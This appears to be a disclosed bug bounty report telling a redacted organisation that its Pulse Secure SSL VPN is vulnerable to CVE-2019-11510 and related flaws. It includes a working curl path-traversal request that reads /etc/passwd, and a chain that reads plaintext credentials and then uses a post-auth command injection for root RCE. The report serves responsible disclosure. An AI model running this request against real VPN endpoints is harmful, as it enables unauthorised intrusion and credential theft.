Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████

##Description Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25: **CVE-2019-11510 - Pre-auth Arbitrary File Reading** CVE-2019-11542 - Post-auth Stack Buffer Overflow **CVE-2019-11539 - Post-auth Command Injection** CVE-2019-11538 - Post-auth Arbitrary File Reading **CVE-2019-11508 - Post-auth Arbitrary File Writing** CVE-2019-11540 - Post-auth Session Hijacking Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf I discovered that `https://██████████` instance is vulnerable to described vulnerabilities. ##POC Reading `/etc/passwd` via CVE-2019-11510: ``` curl -i -k --path-as-is https://██████████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ ``` ``` ███████ █████████ ██████████ ████ █████ ██████ ███████ ████████ ███████ ``` The RCE can be achieved with this chain: 1) Pulse Secure stores credentials in the cleartext. 2) Attacker reads credentials and authorizes on VPN 3) Attacker exploits CVE-2019-11539 - Post-auth Command Injection achieving RCE as root. ##Suggested fix Update the Pulse Secure SSL VPN software. ## Impact Remote code execution as root (by reading plaintext credentials and then exploiting CVE-2019-11539 - Post-auth Command Injection) and accessing intranet behind VPN. You can see here example report to Twitter by Orange Tsai: https://hackerone.com/reports/591295